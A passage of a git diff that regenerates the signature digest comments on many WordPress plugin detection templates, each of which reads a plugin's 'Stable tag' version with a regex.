4a0a00473045022100a6ce2fb69038a81c54e7799092aa8e910bc6e5d732ab65fbc2ea31cba2f2e61b02205c6a5e2f43269ba46d4c14501b220779e8cc30bde46227fdce1dd9e27dbce5af:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450221008bf5bb57574f65c882e3632188870d86f1aaa8bc564365640445fcce5a42931c02201ba3bae99a48d6e654a9099da6bd4ed1abfe5becf1fe317744a324c0480a0efd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/header-footer-code-manager.yaml b/http/technologies/wordpress/plugins/header-footer-code-manager.yaml index 2b6b95c81b..03795212f9 100644 --- a/http/technologies/wordpress/plugins/header-footer-code-manager.yaml +++ b/http/technologies/wordpress/plugins/header-footer-code-manager.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4b0a00483046022100c90e6316ababc81dcd5e6665452b75a66d5b8ab30978980d4a38b0149e2ca2c10221008be02527436861c717cb76101998ff2f99865f59855f65dbd55372287fbced2b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402202ef693c52bf45fd65b1378e46b0ff071f91763124efe5cbfec2dd77a657e84ff02203050173ca2d5275680c0c048e0f9fb3e00780dee2a81ee2f7bebfc6e75919353:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/header-footer-elementor.yaml b/http/technologies/wordpress/plugins/header-footer-elementor.yaml index fe7bcf702d..259e8db909 100644 --- a/http/technologies/wordpress/plugins/header-footer-elementor.yaml +++ b/http/technologies/wordpress/plugins/header-footer-elementor.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4b0a00483046022100d7b488f2920fbbab85e13b96d2560c4b18ac426a201bcd3611dc28a24c642342022100ffbe36b9c37e0d89d29faafbfa64deb119691465f1ff3a7b92f96fe54a760e9a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a004630440220779bed5e2da08e6195437744f6f62d0dd469e6da3583c426257e1a7121d2469302206cff7f3ebd5ce61d54d702281ff712a9d33325ce506fca34dff88a64d74e5dbc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/header-footer.yaml b/http/technologies/wordpress/plugins/header-footer.yaml index b5e8664cbd..f226f3bb6d 100644 --- a/http/technologies/wordpress/plugins/header-footer.yaml +++ b/http/technologies/wordpress/plugins/header-footer.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4b0a0048304602210081f879f59f336ae98455f4b3a0e64582c92af04304b805a4721470e99efdffc8022100e06f0cb7e9f5ee0c3a7339b448aff7e10a05025d82bc9308e9fd58595f988b8a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100fffa876105d8b5279c8a4999163e6e718d6b1db7e510f8d388357ff6d264323d022100c40012e759d1de99d9893ebbab5c0a582de60659bb1d93a4be1e753e3e4168cf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/health-check.yaml b/http/technologies/wordpress/plugins/health-check.yaml index babd3900e2..bd33a60806 100644 --- a/http/technologies/wordpress/plugins/health-check.yaml +++ b/http/technologies/wordpress/plugins/health-check.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4b0a00483046022100c7df88a8dc4de014e61f3ad93bac3809c3d3bbc69ce313bf84874eda9f8f1bd80221008d65baffc9c25b24623d625ecee2c104b1442b16b6437a6f83e127543754c329:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450221008a05f5ed896fe504a6ee7953a7bee911a137f82eae0f3cea24e947603770de6d0220488242397e8d3e764055c0793ac1b28b3333a8fa927f4d3670cc4ffbdea5bf8b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/hello-dolly.yaml b/http/technologies/wordpress/plugins/hello-dolly.yaml index 0f99e62a90..e0ac611e4d 100644 --- a/http/technologies/wordpress/plugins/hello-dolly.yaml +++ b/http/technologies/wordpress/plugins/hello-dolly.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a0047304502207d39cdc52b0a91a6749dcbe9aea14b555ae6b48acca61c6f056ddcd0941eb533022100df82cca29b7a79f62b015666ecaad38e3fee6fa4d47c0e8083b72c55109f703b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100e3d4a3e6597495a1e14d53f3bd8d42611c1b1874c03c98f47c12cc7767a1d741022030e1e4342601a65778737b61ddb4696441840d11520163b719e7ce7797605903:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/host-webfonts-local.yaml b/http/technologies/wordpress/plugins/host-webfonts-local.yaml index fe43baaa8f..b828b9fa12 100644 --- a/http/technologies/wordpress/plugins/host-webfonts-local.yaml +++ b/http/technologies/wordpress/plugins/host-webfonts-local.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a0047304502202e8b511db6e97d1c6f357fb50b5d024432e5d428fb3bf0b546b63799eb2b0c85022100ae9a80ccef1c6bded3165f21712b8a528559305747acdcbcec126507478138c5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100d9fd3a0ec7e87c1aae82a83494bf1932cddf1168d4f2111e32e18c46a83c88e7022100b4270b0bd2240bd66d2d1c2d8a2da48734edb53b914e29ed77338583b0626e20:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/hostinger.yaml b/http/technologies/wordpress/plugins/hostinger.yaml index 19e3288d04..1ecfe01f82 100644 --- a/http/technologies/wordpress/plugins/hostinger.yaml +++ b/http/technologies/wordpress/plugins/hostinger.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4b0a00483046022100cf280bf49bf301c9cd7afa412a3ab11aaecedaa11bb6b191284ceb2b87be25b0022100a79a0b4b479f915a6576f38ca554c852754576250d1747ac268837142c5e4f84:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022002d8c8cd94ea87430b90ae7f0d06c9b8689184a57e4c07e54065bf0f623a387d02204f601d199c8b6e25e1d4c1b69d2cbdc11e61c1cd4fc807ab0b07449ee8ce1472:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/image-optimization.yaml b/http/technologies/wordpress/plugins/image-optimization.yaml index 82ffe0582c..c5fc805160 100644 --- a/http/technologies/wordpress/plugins/image-optimization.yaml +++ b/http/technologies/wordpress/plugins/image-optimization.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 490a00463044022067f3a4a0395e1b62c15c42841fea56e158041086031054bd5ece5605f77a90ef02202b3ebb5c24928aa09aa6a072d5760d1ba2ac4a060ed239ccac3e83c4afcf2e3d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402205b3977ddcb1096a9466ab952b001ea39b8a68358ecae94f9b5cd83913dabf63d02202de8a54c3cf8c2b09b462f5280d1e49b529b9c46cf29a393a074418eeb3be53a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/imagify.yaml b/http/technologies/wordpress/plugins/imagify.yaml index e164fbf8ee..0cd402c8bc 100644 --- a/http/technologies/wordpress/plugins/imagify.yaml +++ b/http/technologies/wordpress/plugins/imagify.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a0047304502201795c0065c76beea1e7bd9b19d50c81b08f7fad8a3496ec1d62254c8c94e66e1022100846983c6e5a43c7093e3d3bea2d8a5595929d2a565961cb4c163586c2bd35e52:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402201970eefe2d9cdcc9bd9cb38a98e06bcd881db4d0350b9063804cad3eda73ddf002202b0a61c26aa83c92ff100da4a49cead9a71347b908af788b8828eab748e9a995:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml b/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml index 0cca8365d3..5ec05742bc 100644 --- a/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml +++ b/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a0047304502204fe23ff760e5d23cffd75abd99ca3956a1fe0752de54e73a3e6600d888a9a43f022100f618bc7b781581928ac24fa5b6a00690dfe06c04be01bf1e76432a3935339639:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a004630440220717443c5a41c49df5494a946be0439e71d757648ce60e863dddb6fc4bf69edc002202917fdf2fdea0adfcd640d02e65f1b2e5d7d3c3cbd9340ea4f93fbeec8466ad2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/instagram-feed.yaml b/http/technologies/wordpress/plugins/instagram-feed.yaml index cf5455bdb5..92c2ce84e6 100644 --- a/http/technologies/wordpress/plugins/instagram-feed.yaml +++ b/http/technologies/wordpress/plugins/instagram-feed.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 490a00463044022069c0ccc658a30f3b4da1e0d3d65d53bcb12d7925cf37c8f2cce561251f00e10702207c680ab2a05ec147238f709efae3baaf048befa588bad809e76f73a708a3d191:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502206b053126bd4300213ca86198f070078bee2c34da6bfeda68f17ce8314aa11ef00221009926ffe6ce8d30259238c6e451691360779fddda507806270dce0b7df6b96f0c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml b/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml index 8d8eb305cd..86a47e35d0 100644 --- a/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml +++ b/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a0047304502210093b7170bbe172f350985f811515d305a142b9353dd79442331e79595aa6d9c1b0220259fc78a970ba73af58e95d8e952342ed44cd50eac131e98102106e588b489b3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100b6f3c3c6788836ea559dbc605e010509439e0f31eece0240c21fbcdfe685efc5022100e26e635021c3ed2ecaa314c75bdf273731f2cf9340d79e9d7ca77298f5dbe568:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/jetpack-boost.yaml b/http/technologies/wordpress/plugins/jetpack-boost.yaml index e8d9f401c9..3e70bcb846 100644 --- a/http/technologies/wordpress/plugins/jetpack-boost.yaml +++ b/http/technologies/wordpress/plugins/jetpack-boost.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 490a0046304402203c92e76ce1c5d39d70c19130527155f3e7312a5bdda4e5db3219894d3f1bb68802203cc21755ba8f7bda031f83a46780c637586608eb6f70365e86ec04a843b88693:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450221009fea55254f6f4278467a01476b4554739763130581538bff0abd629b3f670a5202203fb398e6bc15a43ab9d424cc7b0f044d191f1799930ad0d73a541b6d5ed216c9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/jetpack.yaml b/http/technologies/wordpress/plugins/jetpack.yaml index 64dbeeb680..befa58cf87 100644 --- a/http/technologies/wordpress/plugins/jetpack.yaml +++ b/http/technologies/wordpress/plugins/jetpack.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a00473045022063bfbc233ebef381d5225a42698163fa1a90deaa6ae30ae6b44162d307ca0de0022100c697043419dec812838af2de7c2c5ec2b190f1fcc1127ba20a6785f02868cdd4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100ced45a72658d24f23ad2be1ff4e857a044788d6033441e71d924efd4026b9c49022100e23b27e51a1b6d8956ac1aa590ee4cbf266d0f53bd0f610574effb05339f62f3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/kadence-blocks.yaml b/http/technologies/wordpress/plugins/kadence-blocks.yaml index bd051984af..3e04bc3565 100644 --- a/http/technologies/wordpress/plugins/kadence-blocks.yaml +++ b/http/technologies/wordpress/plugins/kadence-blocks.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 490a00463044022008b7b0f8230439bf51057f2d6d4127782a980b51949f1449736107ba32811dcf0220210a6bcf1f8d49c97e41d7c8566ddaf0c14505f868d8d99718c5d89b2522e473:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502204b9ec5bf72a1bfc86ebe041dcaa0fd7b2e59f267653e9f0ab2b0b6e1b3b92f43022100e2a35a9b9f68943d6d04a0b45f2e7dcb0347b99c0650ff4aee46d74b81838227:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/kirki.yaml b/http/technologies/wordpress/plugins/kirki.yaml index 0b5e5013df..234183a770 100644 --- a/http/technologies/wordpress/plugins/kirki.yaml +++ b/http/technologies/wordpress/plugins/kirki.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 490a004630440220451321300b7b5b0f3b968a6a99105049bd0022a5179fe4373e6eefd4957b957c0220314b87a0e1e3ead48b905ac210f082a9e883b07a9d560e7eb55a62d771cf01b0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502210096c34559c8d26c5b6c5a590756945b6d0ef12d930e79d5ea3b96a70674904ca802204d73115553a45cd6fca931ed47cf2fcbe06c0f34b95c224c16073c0f0c1dcf56:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/leadin.yaml b/http/technologies/wordpress/plugins/leadin.yaml index 54de0efa6d..9f7ff8e0ea 100644 --- a/http/technologies/wordpress/plugins/leadin.yaml +++ b/http/technologies/wordpress/plugins/leadin.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a00473045022100cb38afb997c2bc4d645c5327b6fc7611d17adf001fc366a9692397a59ce4bd660220627c30fb381d7b6df2337648c571f8eceafe437436458984b0659fab26dad616:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100a1e1b11a4833bf74551b7c96f1408d39ea1c289c69a4e5b3c972bbb9b5d0a59602210081e457996d9d2a53bce278e0ef2ce9dade06c2b75e54ca71433a89509b0810f4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml b/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml index 79e70ec4b4..0d55c5e3a8 100644 --- a/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml +++ b/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a00473045022000938cbd10851c1adaef581979c9b6d160ffb3427ef1628f886403dcf54798a6022100da801db6645c2cfbd17d52d383030d1c4c5fc5b93630767bcefd6ef867972bf9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450221009b744c98bcb952ec3b86731b5d003dded10269280af1f7fd60761d54e5d224b20220653955da26338c58cf3b05268b59a4a13c2536951fc43a70ff00820be5e1655e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/limit-login-attempts.yaml b/http/technologies/wordpress/plugins/limit-login-attempts.yaml index 336ec338eb..693111b1ab 100644 --- a/http/technologies/wordpress/plugins/limit-login-attempts.yaml +++ b/http/technologies/wordpress/plugins/limit-login-attempts.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 490a0046304402203866b5d0604edc069313d48fbf5605e14d3697f24fe7149a6743b00aa631af3902203f1152e4ecb5216f16b51503f187769d6353f761c037b2cbd31e2dae50f028f1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100a65d6d1903e32446c009af45aca679dfd4ae0d2b4491af444f0050470f67b1e5022100e4cb2f88d0bcd63c8e6b84c32570646873c0c91f718164e21fe47e004f8ec218:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/litespeed-cache.yaml b/http/technologies/wordpress/plugins/litespeed-cache.yaml index d8ccd654bf..24c11df4f4 100644 --- a/http/technologies/wordpress/plugins/litespeed-cache.yaml +++ b/http/technologies/wordpress/plugins/litespeed-cache.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a00473045022100f8e99fc2d20c78a6fc354e243dd99827523836b616acdbadd24f4c4b1568b899022034898b7a5172baf7083fa454bd2aecfef6a5f0319342ed792b9543187f154a0c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450221009c29332c8eda8c3237eb3e749a23c0ccd80db61273a42546136accdff321d3ab022052659eb144585c56ed79334d07012d3cd158b07b645e9eaf83518a39f99163c4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/loco-translate.yaml b/http/technologies/wordpress/plugins/loco-translate.yaml index 31f207bbb3..b5fee0378f 100644 --- a/http/technologies/wordpress/plugins/loco-translate.yaml +++ b/http/technologies/wordpress/plugins/loco-translate.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a00473045022100eda040d147e35b7f82c450c7bc1ab19fc2820ffb4fa8464909439eb02450bb010220654d92f3b16ede11f054767747bb02330dad420c5462c6221a0cc8f2e3925e35:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402201db30d7bdd18030516ed4171471e71652da84815d0e9421ae89fbeac8e8ce9fe022027a82e5c3cb7e6459cb22aa196651bd8640b2a994cf6d181c0def635820ccf13:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/loginizer.yaml b/http/technologies/wordpress/plugins/loginizer.yaml index 577b31283f..a1f60e6bdc 100644 --- a/http/technologies/wordpress/plugins/loginizer.yaml +++ b/http/technologies/wordpress/plugins/loginizer.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a00473045022100f597e62335b1dcf9fed439c60aad2ac257226da9428d1fd3636b225a64075534022009718ac21811638e93f07100b071bedae27355d024d220fee320a6f7ee00bce1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502210099c5a6564964e941ee739d394495f8a98da4078859859a04efc23cd609dbde9102206389a516bd974664486896962d7aa409d66808b09bdb33104d932980f9613a93:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml b/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml index 55b1b6c927..994712d860 100644 --- a/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml +++ b/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a00473045022006035ab9f0b94a0c508099dd6d82ab7dbe973b4d2672f57ad8d23fdd16dd7f03022100f9aeadd46bc6855c48134d1b7fea64d5acf3a8d8adcb31461d8c38f6e20c840b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100ee2f123e81e08adab437821a0fe342ae3c2f29911aef095aa1613c8d507b2433022011696d1ef1bea0a4cc2e13eb0777078fd601aef8f866cdc93187314e771df22e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml b/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml index 593405a0d1..9768101dfd 100644 --- a/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml +++ b/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a004730450221008422de103a671cb156c2eae798aa75f70fb7d6771f15312ba8c39cba122ff95302204c1a4ec5e061c2a6ad6e685aec440bc4cb025af901ff26e2ffe9f3030b7b1565:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022069ec8beda9d5f39d417ccabf25528abb667b5d3d0bfb2ab18e33c9449039851c0220674d6ea1252a3441767381288506161c281dec9c8e4448710cd4e4f5dc09f293:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/mailpoet.yaml b/http/technologies/wordpress/plugins/mailpoet.yaml index f3d10b173e..5bcbbd8658 100644 --- a/http/technologies/wordpress/plugins/mailpoet.yaml +++ b/http/technologies/wordpress/plugins/mailpoet.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4b0a00483046022100cb49b600ed520be41d530e3599b50ef4c0c93d68fb8e7c33db95dc83473ad95e022100845c10fe1c23a65c6545b949a4c34a602ce533934ba38a41039f81c454f4ac20:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402203adfb08db486963a38386df8b571d71b0d4d19f30826c49221bba42b8c07283602201ccbb2db1a49db991a26cde703e00fd26f1eeb69fa9bc89b4431f9f87643bcb6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/maintenance.yaml b/http/technologies/wordpress/plugins/maintenance.yaml index bf92f3c909..bbdf0f0346 100644 --- a/http/technologies/wordpress/plugins/maintenance.yaml +++ b/http/technologies/wordpress/plugins/maintenance.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a0047304502205de59b68eaaaffa49dbd1e5455d20a198da8473ef009684ac9c1eddd14acd88c022100f4f45976f5a238fc46f032e43e4a984eae5f1d4241ef40d18bc4eefedad0162f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100fa5c02efc86ad2c998af0a94cebfbb27189d581b4a0f2b857170a650810fb5e7022100a6d23c2d13e9658d610fd791e05d17004a566f742fa9a5fd79ea89ebe42dd22d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/mainwp-child.yaml b/http/technologies/wordpress/plugins/mainwp-child.yaml index 83d66e4c5c..bbcf73f3b5 100644 --- a/http/technologies/wordpress/plugins/mainwp-child.yaml +++ b/http/technologies/wordpress/plugins/mainwp-child.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a00473045022100ed58b871fd439a5cd84d2c69892cefc86bdbf2c97ba413bfceb1616c5102633f022078af7fe74e51ab05dc410194181ea6557c7d471e337e6e66405c3cd3b2d9f074:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022007f286e26d27da5823e26020536f5c10f6a5ed2df36339176869f70970e44687022100ebfb3bc3c9aa4275797f4a8eed625fc5fe0787f00ee43a302bc77d0efb329ad0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/malcare-security.yaml b/http/technologies/wordpress/plugins/malcare-security.yaml index ab2cde2a11..391b815616 100644 --- a/http/technologies/wordpress/plugins/malcare-security.yaml +++ b/http/technologies/wordpress/plugins/malcare-security.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a00473045022100aadfaeddb43c1cf3b4b219487ff7c8f4d34cf2148ef7cb7e50a5faff1d7f91b1022005bc47381a042eebffc36eb02932d4d94b1736fcccfc12c7b345e913e685d99f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502200e70e674d601b1eeece68668dfa93023194a1a938cc0a082bbbf94d86125f2cc022100bdb4d346382dd1c0689e4dce866c1958190441ba806429151e1213e6e4a6d3fb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/megamenu.yaml b/http/technologies/wordpress/plugins/megamenu.yaml index 082dfb06c7..6affa96e03 100644 --- a/http/technologies/wordpress/plugins/megamenu.yaml +++ b/http/technologies/wordpress/plugins/megamenu.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4b0a00483046022100f3cde1efd0ac68f71bdaa0d81cfbd8702ce696af746469657f94911e80e9d178022100f4dd87c9409bd24a56ea0a80cc1e63820e82c3c7017b4a99dd98b0a2e58032e4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502200bff490b16c42369f7aa45804cbd60738d10b568bffc3826c4e62b2ab57eefe4022100aae04d7c05512dd51715c0cc5165f6ac7cea5af153a8f8e5b68f538b7846ec7e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/members.yaml b/http/technologies/wordpress/plugins/members.yaml index 861eae9528..006d31f427 100644 --- a/http/technologies/wordpress/plugins/members.yaml +++ b/http/technologies/wordpress/plugins/members.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4b0a00483046022100d74091154f94398aca46e579a41aa0e4e59ff6ae56b52c19f03daca066c428e2022100e857b5a15d954cbc614146409d6d29b89c0dbcc683ef2dfa9ccadaeed05ee9db:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a004630440220209f736da5f6cd91328078ec549fdfaa480dc13d0b484d759f0fbb3fc68996e80220364bf16a2b9539754346c98da2a76481dd1ac9e1c9351b47ff1b479812a36c1b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/meta-box.yaml b/http/technologies/wordpress/plugins/meta-box.yaml index 610f1b780a..48e945c2aa 100644 --- a/http/technologies/wordpress/plugins/meta-box.yaml +++ b/http/technologies/wordpress/plugins/meta-box.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a0047304502202531d9a9e8a50e605a5d89edc7c0882156676b1981037f0b254c3d16ffe7bf0c0221008d0c35126b4fe21da7dad531a26c6aff2d4d4189c8714540957d36e1d5d7692c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100e4c202b0dceedc4d57e2188b985b64469f602b96b8edd955ec13ff6e83b9d45402205cd9e2cfb4cdbc5a7be27a467f9468f61c284c4d9628d4e43d237f416accd4e0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/metform.yaml b/http/technologies/wordpress/plugins/metform.yaml index 688d1c0028..e1372151fe 100644 --- a/http/technologies/wordpress/plugins/metform.yaml +++ b/http/technologies/wordpress/plugins/metform.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 490a0046304402204edbb00099435847c9944a16f5e720ef068d8330c3fcb8f2484254b1c26df2a802202bc0b17fea92d34a18926457a49a28a97cbf77893d8f706739f335bf2b96d1ae:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100e1267a3cc80755615797970f49c26752aeb8cf26a64be04bd44ac57f6ed31da00220681596b87c75c9547c3c8719f5ace26a1d244c719774e03e7bd7665c8fccee2b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ml-slider.yaml b/http/technologies/wordpress/plugins/ml-slider.yaml index 22c73506b8..452342be9b 100644 --- a/http/technologies/wordpress/plugins/ml-slider.yaml +++ b/http/technologies/wordpress/plugins/ml-slider.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4b0a00483046022100a00e2356c44a9002a9d012c0a4a286b4ed3f30677c976a824bb107631803b5fe022100dded8d83eb54144ffe623f0a7d556fbea10716072bc08eb79f83639dfc86f1ec:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100dd005680cd42df12b6c72f63d330bbdc6a26f63822382b352df913464caf53e202210085c19d21190e32664920e3fc0ca9fe419e9f40d0bbc6d0b03b6ed8de62e9d294:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/newsletter.yaml b/http/technologies/wordpress/plugins/newsletter.yaml index 13557cac23..1f981cc4c8 100644 --- a/http/technologies/wordpress/plugins/newsletter.yaml +++ b/http/technologies/wordpress/plugins/newsletter.yaml @@ -46,5 +46,4 